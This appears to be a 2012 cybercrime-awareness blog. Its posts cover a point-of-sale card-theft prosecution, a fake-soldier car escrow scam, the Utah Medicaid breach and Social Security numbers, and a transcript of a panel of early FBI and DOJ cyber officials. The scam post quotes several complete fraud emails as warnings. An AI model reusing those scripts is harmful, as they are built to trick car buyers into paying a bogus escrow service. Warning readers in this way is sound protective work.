Sunday, August 12, 2012

Carder Christopher Schroebel gets Seven Years

21 years old and thinking about Cybercrime as a career choice?  Think again.  Seattle-based U.S. Attorney Jenny Durkan told a press conference back on June 11, 2012 "People think that cybercriminals cannot be found or apprehended.  Today we know that's not true.  You cannot hide in cyberspace.  We will find you.  We will charge you.  We will extradite you and we will prosecute you." (see: MSNBC: Feds Arrest Alleged Credit Card Fraud Kingpin.) 

Christopher A. Schroebel

Durkan seems to be standing true to her word.  Friday her office successfully sentenced Christopher A. Schroebel, a 21 year old man from Maryland, to seven years in prison. 

The "Official" complaint against Schroebel says that on a date before July 20, 2011 and continuing until August 3, 2011 Schroebel was stealing information from Mondello's Italian Restaurant,  specifically the data from credit cards belonging to K.H., K.W., J.H., V.D., S.J., and M.H..  That gives us the first charge - Obtaining Information From a Protected Computer.

An interview in the Seattle Times explains what Schroebel did, from the perspective of Corino Bonjrada, the owner of Modello Risorante Italiano.  Schroebel had planted spyware in the Point of Sale terminals of dozens of businesses.  Bonjrada told the Times "Some of my customers were saying they didn't know if they wanted to come back.  They were afraid."  Some of the customers were hit with fraudulent charges "within 10 minutes"of swiping out at his restaurant.  (See: Dutch man charged with stealing Washington credit cards.)
Schroebel was arrested last November possessing over 84,000 stolen or purchased credit card data stripes and made his first court appearance November 21, 2011.  At that time, he was sentenced to an inpatient substance abuse program, and was released from that program on December 26, 2011.   He was picked up and arrested again on a local warrant, and ordered detained as a flight risk January 24, 2012.  So, he has already been in prison nearly more than eight months at this point.  (Detention order is available at

Schroebel entered a plea agreement on May 15, 2012,  and was held pending his August 10, 2012 sentencing.  (See: PACER case number; 180519, Docket 2:2011-cr-00391-RSM.)

The Seattle Police Department describes it a bit better:

The SPD has been actively investigating unauthorized computer intrusions ("hacks") into the computer systems of small businesses located in the Western District of Washington (including Mondello's Italian Restaurant in Magnolia and Seattle Restaurant Store in Shoreline).

The person/s responsible for the hacks installed malicious software ("malware") on the computer systems of the victim businesses.  The malware was designed to, and has collected credit card account numbers belonging to customers/clients of the victim businesses.  The stolen credit card account numbers were then transmitted over the Internet to a computer server under the control of the hacker/s and/or their associations.

USSS ECTF/NCFI Success Story

That's from the affidavit of a SPD Computer Forensics Detective, David Dunn.  He is a member of the USSS Electronic Crimes Task Force, Seattle Field Office.  The Secret Service partners with local police departments all across the country to share their Computer Forensics capability in the form of free training and expertise to help work these cases.  Part of that training is right here in Hoover, Alabama at the National Computer Forensics Institute.  (David actually responded to this post, giving permission to share his name, and confirming that he took AFT (Advanced Forensics Training) and NITRO (Network Intrusion Response) courses at the National Computer Forensics Institute in Hoover.)

Listen to the training and experience this guy got by being a local law enforcement part of the USSS Electronic Crimes Task Force.

In April of 2005, I was transferred to the Seattle Police Department Fraud unit as a Computer Forensic Detective.  I am currently, and since October of 2006 have been assigned as a full time member of the USSS Electronic Crimes Task Force, Seattle Field Office.  I hold a Special Deputation appointment through the United States Marshals Service that permits me to seek and execute arrest and search warrants supporting a federal task force.  As a member of the Seattle USSS E-Crimes Task Force, I investigate violations of federal law in the state of Washington that fall under the responsibility of the USSS, with an emphasis on crimes involving computers, the Internet, and electronic communications.

(...Many local training courses listed, and then... )
My training and experience also specifically includes training and experience regarding computer and network intrusions, commonly known as "hacking."  This includes completion of the 40 hour "Incident Handling and Response" course on network intrusions and incident response through the Department of Homeland Security.  I have experience with packet analysis, malware, and viruses.  I am a Certified Ethical Hacker.  I have attended 104 hours of training in Network Intrusion Response at the National Computer Forensic Institute.  I hold the following certifications: EnCase Certified Examiner, Access Data Certified Examiner, IACIS Computer Forensic Certified Examiner.  I have received advanced training in both network intrusion forensics as well as Point of Sale forensic investigations.

As a member of the USSS ECrimes Task Force, I have worked on numerous computer and network intrusion cases.  These cases have involved a range of hacker techniques and modus operandi, including social engineering, SQL injection attacks, botnet attacks, malware infections and various other menas of computer infection and attack.  I have examined myriad server logs and volumes of  IP address information as part of my investigation of various hacking cases.  I have also created and examined forensic images of dozens of infected and hacked computers and servers.  I have investigated cyber cases involving both national and international victims and suspects.  As a result, I am familiar with schemes involving large scale Internet crimes and network atacks.

(Here's a picture with my summer students from the National Science Foundation Research Experience for Undergraduates at the NCFI - sorry - shameless plug - I think this place is great!)

Back to the Hacking Charges

The Complaint then says that "knowingly and with the intent to defraud, trafficked in and used credit card track data from credit card accounts belonging to (the above) without their knowledge or consent, and by such conduct obtained profits aggregating $1,000 or more, said trafficking affecting interstate and foreign commerce, in that the credit card account numbers that were so trafficked and used by Schroebel and others to make fraudulent purchases in states outside the State of Washington."  That's the second charge - Access Device Fraud.

When Schroebel was arrested, he was in possession of 84,000 credit card numbers that he had stolen or bought from other hackers.

When the SPD investigated the charges made on the cards used by the customers at Mondello's they led them to California. One of the cards, belonging to K.H. was used at Home Depot, Wal-Mart, Jack-n-the-Box, and several other locations.  V.D. and S.J. dined together at Mondello's on July 30, 2011, and BOTH had their cards being used for fraudulent purchases in Southern California on July 31, 2011.

That's where we get to the next interesting member of our trio, GUERILLA BLACK.


(click for press release)

The Indictment of Guerilla Black fills in the California end of the story.

Guerilla Black is described as a "B.I.G. look-alike" (or some would say imitator).  Apparently the record sales needed a bit of supplement to help him live the private jets and limos image he attempted to maintain in his youTube videos.  (Shown above is the track "Compton".)

From at least January 2011 credit cards stolen by Schroebel were showing up in California, being used by Guerilla Black and his crew.  Black's indictment shows many entries such as:

19. On or about February 9, 2011, the coconspirator who hacked the point of sale computer system at the Shoreline, WA business sent an e-mail to CHARLES TONY WILLIAMSON, that contained multiple customer credit card numbers that were stolen through the hack of that business, including at least one credit card number that had been issued by Boeing Employees' Credit Union.


32. On or about July 31, 2011, the coconspirator who hacked the point of sale computer system at the Seattle, WA restaurant sent an e-mail to CHARLES TONY WILLIAMSON, that contained multiple customer credit card numbers that were stolen through the hack of that business, including at least two credit card numbers that had been issued by Boeing Employees' Credit Union.

 (Gee, which two would those be?)

The indictment lays out that Williamson "expressed his preference and desire to coconspirators to buy 'dumps' of stolen credit card numbers 'in bulk,' that is, in lots of at least 100, or 500, or more."  and that he "expressed his preference and obtain credit card numbers that were 'freshly' stolen through 'point of sale system' computer network intrusions rather than card numbers that were skimmed or stolen from credit card databases compiled by others, because the 'fresh' card numbers stolen from point of sale system hacks could be used more successfully for fraudulent transactions."

Williamson "redistributed the stolen card numbers to a network of criminal associates, with the intente and the expectation that these associates would then use the stolen credit card numbers for fraudulent transactions."

But Williamson wasn't the only one Schroebel was selling to . . .

Schrooten / Fortezza

As it turns out, Schroebel would sell the cards he acquired from these POS terminals to another 21 year old, Dutch national David Benjamin Schrooten, who ran a website that sold credit cards to others for their use.

Schrooten will be well-known under his hacker name "Fortezza" to anyone who follows the excellent blog  Krebs story Feds Arrest Kurupt Carding Kingpin tells us more about the English language carding site run by Fortezza called  According to Krebs, Fortezza gained many of his cards by breaking in to a competing carding site.  In retaliation, THOSE carders posted a message announcing that Fortezza "needs to learn not to fuck with Russians !!!" and providing his information, including real name, city, home address, shipping address, telephone number, and fax number.

Krebs has a screen shot of the post on his blog:

Schrooten was arrested as he got off a plane in Romania, and later extradicted to the United States.  He will be tried in September in Seattle.

(click for press release)

According to the Schrooten indictment (also from KrebsOnSecurity) Schrooten is charged with Conspiracy to Commit Access Device Fraud and Bank Fraud, 2 counts of Access Device Fraud, 5 counts of Bank Fraud, 1 count of Intentional Damage to a Protected Computer, and 5 counts of Aggravated Identity Theft.

As we've discussed before, one of the ways our judicial system is not geared up for handling international cybercrime is that wherever these cases are tried, they address only the charges LOCAL TO THAT JURISDICTION.  So, in this case, the trial is in Seattle, which means the only victims who can be named are those with a connection to the Western District of Washington.  Particularly this trio of cases focuses on the charge that the Boeing Employees' Credit Union, and members of the credit union who reside in the Western District of Washington, had money stolen by these criminals.  So, the counts of Bank Fraud against Schrooten specifically refer to transactions on April 25, 2011, August 20, 2011, December 21, 2011, and two on February 1, 2012, where the account holder was a BECU customer who lived within the jurisdiction of this court.

There will likely be more arrests, and more sentences, in this case in the near future.  I wanted to share it now though because it is a great example of what happens when a smart local detective partners with the USSS Electronic Crimes Task Force, and runs down a local crime, along with its international implications.

Wednesday, June 20, 2012

Soldier Auto Escrow Scam

Last night I got an email from a student ...
My brother is wanting to buy a car that is in the UK. The seller is claiming she will get free shipping from military affiliation. She wants to conduct the deal through eBay's buyer protection program. She's selling a fairly nice car for 1700 dollars. No money changes hands until the car is in my brother's possession and he has approved of the car (10 days to approve). What do you think?

Sounds pretty good, with the little caveat that the seller doesn't own the car, but he DOES own the escrow service where you are expected to put your money! THIS IS A SCAM, usually tied back to Romania.

A recent headline in Boston was Romanian Mobster Arrested in Lexington May Be Tied To Car Scam (April 4, 2012, CBS Boston). In that story, Catalin Buzea of Romania was opening bank accounts with a fake passport when he was arrested. He was said to be "duping people nationwide who are buying cars online ... a well trained thief working with counterparts in Romania ... they successfully direct online car buyers to bogus yet very real looking online payment systems." Buzea wired more than $100,000 back to Romania in three weeks, all the result of online auto scams.

It is rather amazing that Buzea and his crew are still in operation after last year's news. In July 2011, US and Romanian police arrested more than 100 people who had stolen more than $100 million from online scams similar to this. Romanian police arrested 90 people after doing 117 raids in 9 cities. In the US, "money mules" (called "arrows" by the Romanians) would retrieve money from US bank accounts using fake identities, such as Buzea did. In the July 2011 action the case was developed by arresting "arrows" in Florida, Kentucky, Missouri, Pennsylvania, and Texas, who were all used to provide clues to the Romanian police. The DOJ Press Release listed many criminals involved in these schemes including Vadim Gherghelejiu, Anatolie Bisericanu, Jairo Osorno, Jason Eibinder, Ciprian Jdera, Pedro Pulido, Ivan Boris Barkovic, Beand Dorsainville, Sergiu Petrov, Oleg Virlan, Marian Cristea, Andrian Olarita, Adrian Culda, Tiberiu Zachiteanu, Marion Potcovaru, Augustin Prundurelu, Georgina Andrei, Sorin Mihai Madaian, Victor Angelescu, Klara Mirabela Rusu, and Eduard Sorin Neacsu. But based on this morning's report from the UAB student, a few more still need to go to jail.

This scam comes up often enough that I thought I might make a post about it here. The language used in the initial contact is "fill in the blank" so I hope that someone will read this and find themselves warned.

Here's a sample message.

Hello and sorry for my delay,

I'm SGT Paul Hayes. This Corolla LE is in perfect working condition. This vehicle engine runs very, very smooth. No electrical problems on this beauty. This detailed vehicle makes the exterior looks like it just came off the assembly line. The car has 35k miles. VIN Number: 2T1BR32E76C639533

CD Player Transmission: Automatic Air Conditioning Anti-Lock Brakes Driver Airbag Passenger Airbag Side Airbags Cruise Control Power Locks Power Windows Power Seats Click this link for more pics:

As I know that my current situation is pretty special I want the deal closed only through eBay's Buyer Protection Program in order for you to be 100% protected. You will make the payment to eBay and they will hold the money until you receive the car. ONLY AFTER you receive the car and you inspect it(for 10 days) eBay will release the payment to me; in this way we are both protected. Anyway i am sure that if you won`t be satisfied about the car i will surely find another buyer in your area and there will be no need for you to ship the car back. I am located in London, UK and I was sent here with my department of peace maintenance. Two months ago, my wife moved here with me and brought the car with her, but now we have to sell it back in the United States because we can't register it here; it has US specs and everything, and registering it here in Europe will take for ever. My final price on it is 2,950 USD. If you will take it for this price, I am willing to handle the shipping. It will be shipped from here by plane with US Air Military Cargo so it will not cost me anything. You will get it to the nearest airport in your area and then it will be trucked forward to your place. You will receive the car in about 3 days. Please get back to me asap if you decide to buy, and include in your e-mail your full name and address where you want it shipped so I can start the deal with eBay. You will receive all the transaction payment and shipping details from them.

Best Regards,

Paul and Stephanie Hayes

That message is from November 2008, and is ALMOST identical to the message the student's brother received.

So what do you do about Soldier Auto Escrow Scams?

The best investigative team I know that works these issues is actually the eBay Motors security team. They have some great advice available on eBay Motors Security Center website. They recommend that you forward any suspicious emails you receive to "" -- and they actually don't mind whether the email started at eBay, Craigslist, or anywhere else. If there is a scammer who is selling cars on the Internet, ESPECIALLY if it mentions an escrow service or eBay, please send a copy to ""!!

If you actually lost money on one of these, please be sure to report it also to the FBI through the Internet Crime Complaint Center. The form makes it difficult to just share clues if you were not actually stolen from, but if you actually lost money, it would be well worth reporting there!

Related scams

Sometimes the best "proof" you can share with a skeptic-friend who is considering falling for the scam despite your warning is to show them ALMOST IDENTICAL emails from other victims. Here are a few to get you started:

In November 2009 - Fraudwatchers saw SGT John Edwards selling an Altima SL with VIN Number: 1N4BL11D65C376012.

June 15, 2012 - Jules was almost scammed buying a Honda Accord EX from SSgt Monica Dixon with VIN Number: 1HGCM56744A118864.

January 13, 2008 - Katy Lee was offered a Honda Accord EX by Sgt. Robert Parra with VIN Number: 1hgcg1655ya068349.

January 23, 2010 - FightTheScams posted about SGT Jacob Gulledge selling his Accord EXL with VIN Number: 1HGCM66825A031982

They don't have to be in London . . . Sgt. William Thompson is selling his car from Afghanistan using a very similar scam.


I am emailing you regarding the 2003 Mazda 6 that I have for sale. The general condition of this car is excellent, very well maintained, no damages and no mechanical problems, the engine runs and sounds awesome, automatic transmission, 4 Cylinder 2.3 Liter, tan leather interior and white exterior with no cosmetic complaints really worth comment. The alloys are all presentable and originals the fronts having a few marks, all tyres in good condition with plenty life remaining. Clean carpets, seats, roof, boot and plastics. Both remote keys are present and they are working, no electrical issues. I do have the title, clear, under my name. The car has 90,136 miles, year 2003 and VIN#1YVFP80C635M26324. I’m not interested in any trades only to sell it!

Price was reduced to $1,995 (URGENT SALE) as I need to sell this car before June 25 when I will leave with my platoon back to Afghanistan and don’t want it get old in my backyard.

I though you might want to see more pics, click on this link:

Hope to hear from you as soon as possible!

Thank you,
William Thompson

Lt. Steve Hoinski is selling his 2005 Audi A4 from Madrid Spain, but the description sure sounds like he's in London!
As I know that my current situation is pretty special I want the deal closed only through eBay's Buyer Protection Program in order for you to be 100% protected. You will make the payment to eBay and they will hold the money until you receive the car. ONLY AFTER you receive the car and inspect it (for 10 days) eBay will release the payment to me; in this way we are both protected. Anyway i am sure that if you won`t be satisfied with the car i will surely find another buyer in your area and there will be no need for you to ship the car back.

I am located in Madrid,Spain and I was sent here to improve the military relationships between our country and Spain. One month ago, my wife moved here with me and brought the car with her, but now we have to sell it back in the United States because In order to be able to register this car here, I would have to pay very high import/custom taxes. My final price on it is $ 2950. If you will take it for this price, I am willing to handle the shipping. It will be shipped from here by plane with US Air Military Cargo so it will not cost me anything. You will get it to the nearest airport in your area and then it will be trucked forward to your place. You will receive the car in about 4 days. Please get back to me asap if you decide to buy, and include in your e-mail your full name and address where you want it shipped so I can start the deal with eBay. You will receive all the transaction payment and shipping details from them.

Thank you and have a nice day,
Lt. Steve Hoinski

Looks Too Good To Be True

There's dozens and dozens of these, but some good advice can be had from the "" website that has a page that explains Escrow Fraud. Use the "Looks Too Good To Be True" test on your sale . . . There's a reason they are selling it at "looks too good to be true" prices:

"One month ago my wife moved here with me and brought the car with her but now we have to sell it back in the United States because we can’t register it here; it has US specs and everything and registering it here in Europe will take for ever."

They are going to ship you a car internationally in a very short period of time:

"You will get it to the nearest airport in your area and then it will be trucked forward to your place. You will receive the car in about 4 days." (In reality you would be lucky to get a car from KANSAS in four days!)

They claim the deal is with eBay, even though they aren't selling the vehicle on eBay:

"Please get back to me ASAP if you decide to buy and include in your e-mail your full name and address where you want it shipped so I can start the deal with eBay."

(eBay will only stand behind eBay deals where the whole transaction happens ON eBAY! Don't fall for these scam deals ... when someone tries to steer you OUTSIDE of eBay they are normally planning to rip you off.)

For American buyers, the only Escrow service that eBay supports is "". They have tips for how to do an escrow purchase on the website Using escrow services for eBay Motors vehicles purchases.

Saturday, May 19, 2012

What about the Social Security Numbers? (The Utah Data Breach and your SSN)

The Utah Data Breach

This week the continuing saga of the Utah Medicaid Data Breach continued to unfold.

If you haven't been following the story, here's the play-by-play:

That is an amazing story. Remember that Utah only has 2.8 million people according to the US Census. So in this single data breach 28% of the residents of Utah had their personal information stolen from them, and 10% of them had their Social Security Number stolen.

The good news, if there is any, is that Utah is now Very Serious about Identity Theft, launching its new IRIS: Identity Theft Reporting Information System in response. What will it take for the other states to get serious about identity theft?

What About Social Security Numbers?

The Utah story was only intended to be a vehicle for asking this question. What are we doing about Social Security Number theft? If hackers get your password, you can have your password reset. If hackers steal your credit card number, the bank will issue you a new one. If your bank account is breached, it is not uncommon to have the bank CLOSE your account and open a new account for you. But what if you the hackers steal your Social Security Number?

The first place that seemed reasonable to check was the Social Security website. They have a page about Identity Theft called Identity Theft and Your Social Security Number (SSA Publication No. 05-10064, ICN 463270, August 2009).

That form asks "What if an identity thief is creating credit problems for you?" and answers the question:

If someone has misused your Social Security number or other personal information to create credit or other problems for you, Social Security cannot resolve these problems.

They have several recommendations:

But read on . . . IT IS POSSIBLE to get a new Social Security Number, and Social Security will work with you to do that IF YOUR NUMBER IS BEING ACTIVELY ABUSED, but they warn that getting a new number may actually be worse than the abuse. For example, in the United States, the key to your credit history is your Social Security Number. If you get a new number, congratulations, you now have Zero Credit History. You won't be able to get a credit card or a loan without a lengthy ordeal or a co-signer.

So what is the answer? Despite all the controversy, it may be time to go back to the discussion of a National Identity Card. I visited Spain last summer and my banking security friends marveled at how the US clung to our antiquated system. They have a National Identity Card (DNI - Documento nacional de identidad) that is carried at all times. The chip in the card contains a digitized version of a photo of the bearer, plus a digital version of their signature and finger prints! There is no value to having only the Number -- my friend who was explaining it to me said you can write your number on your business cards, because there is NOTHING ANYONE CAN DO by simply having the number. It is the CARD that has value. If you have my number, but not the chip in my card, it is worthless to you.

I'd like to see this discussion move forward. If criminals don't already have your Social Security Number, it is certainly only a matter of time. Even if it is only a theoretical question right now, it is extremely likely that this question will be a personal matter to you or someone you love in the near future.

Especially if you live in Utah.

Lessons from the First Cyber Cops

I was so excited to see Bob Gourley's blog post "A Lesson From the First Cyber Cops" which is how I learned about an event on May 16th hosted by the Atlantic Council. As part of a program called the Cyber Statecraft Initiative, Jason Healey moderated a discussion called: ”Lessons from Our Cyber Past: The First Cyber Cops”.

The panelists were all people that I have met and been very impressed with over the years: Steven Chabinsky was the lawyer who served as Senior Counsel to FBI's Cyber Division and advised our InfraGard national board when I served in 2002-2003. He was the first lawyer I met who actually understood what cyber was all about. He's currently the Assistant Deputy Director of National Intelligence for Cyber.

Shawn Henry, former FBI Executive Assistant Director of Criminal, Cyber, Response, and Services Branch, and now a principal at CrowdStrike. I saw him last sharing his passion for the InfraGard program up in DC last November.

Christopher Painter, the Coordinator for Cyber Issues at State and former U.S. Attorney, Computer Crime and Intellectual Property Section of the Department of Justice, who I first met as I was learning about the "24/7 network" of international information sharing that he helped to build.

What I've done here is listened to the audio recording of this panel session, and done my best to accurately transcribe what I heard. I think you'll find it as fascinating as I did, but encourage you to Listen to the MP3 if you have time. There were about forty minutes of Q&A from the audience at the end that I have not transcribed. Any errors in transcription are mine, please take this as "gary's notes" and use the MP3 as your authoritative source.

Getting Started in CyberCrime Investigations

Q: What got you started in Cybercrime?

A: (Chris Painter) Always interested in technology, while I was in college and law school. In 1991 went to the US Attorney's office in California. This was before the web, but many companies, and the government, and the military and others were certainly relying on computers.

I was working with Scott Charney who had started the first Computer Crime unit. There were several companies experiencing theft of source code, including cellular phone companies, and the University of Southern California, where they had data losses, but also someone storing stolen data there. That turned out to be Kevin Mitnick. We had great FBI agents here, Trent Teyema, Ken McGuire and others. In the course of investigating Kevin, I had to learn Linux, and how to review log files. Worked with the first Stock manipulation cases, the first eBay case, which was the Mafia Boy DDOS case, which was the first case I worked with Shawn on. Back in that day a plane was circling the court house with a banner reading "FREE KEVIN!"

A: (Steven Chabinsky) The way I got into computers was with games. In 1979 or 1980 I had a cousin that had a TRS-80. He was signing in to a service called "The Source" and he allowed me to play "Adventure". One of those games where you typed "Turn Right" and it says "You see a nasty elf, what do you do?" and you type "Fight Elf" and it says "The nasty elf killed you!" I was fascinated. I was the kid that worked every day after school, not to save money to buy a car, but to buy an Apple computer. The one I wanted was 1200 bucks and it didn't come with a floppy drive. A floppy drive was another 400 bucks. It came with 48k. I had to buy another 16k just to be able to program, in Fortran at the time. I end up joining the FBI. Fast forward. In 1998 President Clinton had PDD-63, and the FBI was put in the lead of the National Infrastructure Protection Center. The concept was that multi-agency and private sector had to work together. They needed another lawyer, and I raised my hand immediately. It had to do with Cyber. In 1996, Cleveland, Columbus, and Toledo had started InfraGard. I really need your help. How would we nationalize this program? We took this group of a couple hundred people and today it has 50,000 members. The FBI only has 30,000 members. After September 11th, it grew to be beyond Cyber and to include Critical Infrastructure. And in that time I began to give legal advice, and began to give legal advice on all sorts of intrusion cases, which is how I met Shawn Henry.

A: (Shawn Henry) I'm honored to be with two of my closest friends. Our relationships developed because we were on the front line in this space in 1999 and 2000. There were not a lot of things known at this time. I latched on to these two attorneys who were working in this space and who were most importantly innovative. My start was very similar to Steve's only instead of playing with an elf, mine was Star Trek. You see a Klingon ship. Turn right. That was my interest as a freshman in high school. When I joined the Bureau there were some linux courses and cyber courses available and I took them. There was a vacancy as Chief of the Cyber Investigations Unit and this was a natural route for me to take.. I had spent a couple years at headquarters as a supervisor. I wanted to take the things we did in the physical world, the things we learned fighting organized crime and terrorist groups, white collar crime, and apply them in the Cyber realm. I had a lot of experience using authorized intercepts, wiretaps, informants, that sort of thing. This was 1998. I remember sitting there with Steve in the command post at 11:59 PM on New Year's Eve watching the countdown, 9, 8, 7, ... when it hit zero, the lights went off. Because someone had flipped the switch off as a prank. But Steve and I started working the very first undercover case in the Computer Intrusion environment. We had hundreds of cases at the time but we had never used this technique. It was the first time Steve and I had met to chat about the legal consequences. We had an undercover agent who joined a hacking group, who actually did some hacking - all segmented and legally authorized - it gave us great insight into the group and is now common practice for us. That would have been February or March of 2000. We did get a prosecution, but I can't say what group.

What were the Wake Up Call events?

Q: The DOD has been through several "wake up call" events, the latest being Buckshot Yankee. Has DOJ been through that as well?

A: (Steve) Yes, with Solar Sunrise we see military computers, .mil computers, being intruded upon coming from abroad. It was happening during the conflict with Iraq. The traffic is coming in from a middle eastern country, and it really looks like this is an attack coming from a nation state. There was the obvious real possibility that we were under attack. If we are, how do we handle attribution, how do we respond. Of course the FBI does their investigations constitutionally, by the rules, regulations, statutes, and constitutional requirements of the US, not traveling easily in ways that would impact the sovereignty of other nations. Dealing with probable cause and beyond a reasonable doubt. Is there enough to justify a military response. We were at the table saying that we don't think there is enough attribution at this time. Of course we know the end of the story. A couple kids in Cloverdale, California, working with a young adult in Israel, purposely routing their traffic to make it appear to be coming from another country. (Gar-note: we blogged about The Analyzer, the Israeli in Solar Sunrise.) What was the moral of the story? Our .mil had been intruded upon. It could have been used to launch attacks on other countries. Will our adversaries show the same restraint if they were to see our computers attacking them? Another incident involved the White House, getting all the named players on a teleconference, this was before DHS. A large botnet, a very large botnet was being assembled - is it possible that it is being grown to attack the United States? Well, no, in the end it was being used for click fraud. (Laughter) Yes, your reaction, it becomes comical. But at the time, you can't anticipate the end of the story while you are in the middle of it. Early on we were thinking an attacks was coming from your country, but now its gone to the other extreme, there is such poor attribution that the problem has resolved itself. We're better at understanding the motives of events. We don't have White House calls about these incidents any more.

A: (Chris) You asked about wake up calls, we've had several, but they are like wake up calls with a snooze button. It gets attention briefly and then we go back to sleep. Back in 2000 when we saw these big botnets being built, we thought this was going to be how the criminals took down everything. But then we started seeing the large DDOS events against media companies like CNN. They got a lot of media attention, it took a few months, but we found him and it turned out to be a 13 year old boy, MafiaBoy, living in Canada. At the time we were saying "This must be a nation state! It's too sophisticated, it couldn't be an individual." RCMP monitored his communications back to his house. The father was ordering a hit on one of his colleagues, so it was Mafia Dad and Mafia Boy, great family.

That was one wake up call. Later on you had the commercialization of this with botnets, botherders, and then the lone wolf, lone gunman hackers, who kept a low profile who didn't want to be seen who wanted to steal money or trade secrets from companies and others or having an impact on infrastructure. The early Infrastructure impacts were inadvertent. Some kids playing in a telephone switch who impacted a local airport ... (24:40) ... these all built on each other to create the atmosphere now compared to even five years ago is dramatically different, because of these cases, successful cases that we've talked about and other things that have happened.

A: (Shawn) We haven't had the wake up moment yet globally, and we won't until there are physical implications ramifications of an actual attack. When the lights go off for a period of time, or when people die. Its the equivalent of planes crashing into buildings. People take terrorism seriously when they see blood in the streets. For me the wake up uwas the I Love You virus. Around Valentine's Day, I love you, everyone wants to know who, so they all click on it and have a virus. It had a cascading effect around the world in 24 hours. This is not a United States problem, this is a global problem. In the past it was relatively clear where venue was. We had victims in all 50 states and 56 field offices who all claimed they had venue. I had to decide where, as chief of the unit, where venue was going to be and which field office was going to work that case, and I did it without conferring with the US Attorney's Offices. I gave it to Newark, and their US Attorney's Office jumped on board. When ultimately at the end of the day we identified that this was a young man in the Philippines, he was identified and someone put their arms on him, but in the end the Philippines had no law against what he did. Even though he was identified, even though he caused great economic damage, nothing happened. They arrested him, but then they let him go. The global element here. How do we look at this as an International level. Its an international problems. We need to have consistent laws, consistent strategy. We have to have a consistent understanding. The FBI has now centralized rather than 56 field offices operating independently there is a central command. Headquarters will decide how things get done. We, and not just the FBI, but the community as a whole have become much more strategic in our operations and much more strategic in the execution of our mission.

A: (Steve) Cybercrime has lead in terms of our understanding and Cybersecurity followed on. People were working on cyber crime policy before they were thinking at a policy level about cyber security, partly because of the I love you virus. There was a lot of efforts through the G8 to focus on cybercrime. There was a ministerial meeting back in 1999 where this was pushed as a major initiative. Three legs of a stool, you had to have good capacity to fight these crimes, good laws in place, and the capability to cooperate internationally. The G8 and then the Budapest Convention on Cybercrime, the Council of Europe convention that is still the single item that really deals with these issues. The 24/7 program which started with 8 countries and now has 60 countries. There was a lot of work enhancing the Legat program around the world. It was really good expert work among the cognicenti that has now reached the leadership of these governments.

A: (Shawn) I think you are being modest Chris, because the world looked to you and your colleagues at DOJ. The Philippines ended up updating their laws in just a couple months and the world followed. The Department of Justice put us in a leadership role here. The United States, through the Department of Justice, really put us in place. I haven't seen any cases in the last eight years where we haven't been able to prosecute because the laws were not in place.

A: (Steve) I'll go back to what Shawn said -- Its not about all following the cyber trail. There is the money trail. You have to combine all these things. There are a lot of countries where it is still illegal to do undercover operations. You can react all day long, but if you can't get inside these organizations and bust them down from the inside.

Are We Winning?

Q: It sounds like overall on the cybercrime and law enforcement side in the US, we've made great progress. Are we winning?

A: (Shawn) We are not winning

A: (Steve) But I don't think we are losing. This is why I always hate this question! (Shawn: The State Department!) What are the metrics for winning? How do you measure winning or not winning? Clearly there is much more awareness, there is much more law enforcement resource, there are things like Infragard on the private sector, there is more international awareness of this, but the threat has gotten bigger. Criminal groups, nation states, potentially terrorist actors though we aren't seeing this yet. We clearly are more reactive than we should be and we need to have more capability to fight it. Yes or no.

A: (Shawn) When I say we aren't winning, we are not getting ahead, we are falling behind. We are having impact. We are having success. Through the efforts of the FBI, the Department of Justice, the Intelligence community, and the private sector, we have had impact. We have made arrests, we have identified groups, we have attribution, but we are not getting ahead, we are falling behind. there is more and more data getting pushed, more and more people coming online more subjects getting into this who are realizing opportunities to exploit and to line their pockets, and there are countries getting involved in cyber espionage. We are having successes but we are falling behind.

A: (Chris) We are having successes. I came to this in August of 1998. The private sector is working together, the government and the private sector are working better together. I'm seeing more arrests. Tactically, you can show a chart showing how we've improved. We're doing better, but the threat is outpacing our capabilities. When we look at our strategy - what does success look like? The reason we are getting further behind - early on we saw this as an Internet problem a net-centric threat. Over time we've come to see this is a technology threat. Every aspect of our lives are chip-enabled. The threat is controlled by technology. The vulnerabilities to automobiles there are chips controlling your accelaration chips control your brakes. Can we get in through bluetooth? Biomedical devices - there is software in the insulin pump that allows for remote diagnostic capability. There are chips controlling the flow of insulin into your body. Can we cause that to happen remotely? The researchers say yes. You see the problems with Wireless, purposeful interference and jamming. We are becoming more reliant on inherently vulnerable products and services. So the combination of those two make us as a strategic point, falling further behind. We are getting to a point where we have to reflect on what risk mitigation looks like in this area. Whether our policies that focus predominently on vulnerability mitigation and whether that is a successful long term security model. If you think of most security models they rely on on threat deterrence - the notion that the actor won't act because there will be some deterrant effect. you'll be captured, have some penalty. Here we have a model relying on hardening our targets. That's not how we live in the real world, that's called a fortress. Technologies are not meant to be bunkered down. It's not surprising as we accept technologies that are not fortressed and bunkered down, when we have a risk model that doesn't rely on threat deterrence, we'll fall further behind.

A: (Steve) We have to have both of them. You need to lock your doors which we haven't done a good job of, AND have consequences for the people who break in also. There is a lot more to do on hardening the targets and locking the doors, but you have to do threat reduction and threat deterrence. The question is, If you are a cyber criminal, let's take the criminal element for now, it used to be really costless to you, could route your attacks through other countries, you really wouldn't think there was any chance of getting caught. Most cyber criminals ... There have been some great deterrent cases, Getting deterrence cases out there, undercover cases taken down that make the criminals not trust each other. But there is no perception of risk. The positive side if there is a benefit to the criminal, but there is a neglible chance of getting caught, you aren't going to have an impact.

Lessons Learned?

Q: When I look at DOD, I see them caught up on the same questions they had in the late 90s on organizations, and authorities, and definitions, but when I look at Cybercrime it seems you have made progress beyond all that. What are the most important lessons, and are those lessons being inculcated on the new agents, new attorneys?

A: Understanding the scope of this problem and how it will impact your life. There is an age-old problem that the three of us have dealt with for years, which is that victims won't come forward. There is a sense there is nothing government will do for them. That they would be further victimized, that law enforcement would come in and cart off their computers, that they would suffer public reputational damage if it was found out. We need to move this from the area of cyber intrusions being some special sexy kind of thing, but more like bank robberies in Los Angeles. There were many bank robberies in Los Angeles, but people kept using the banks.

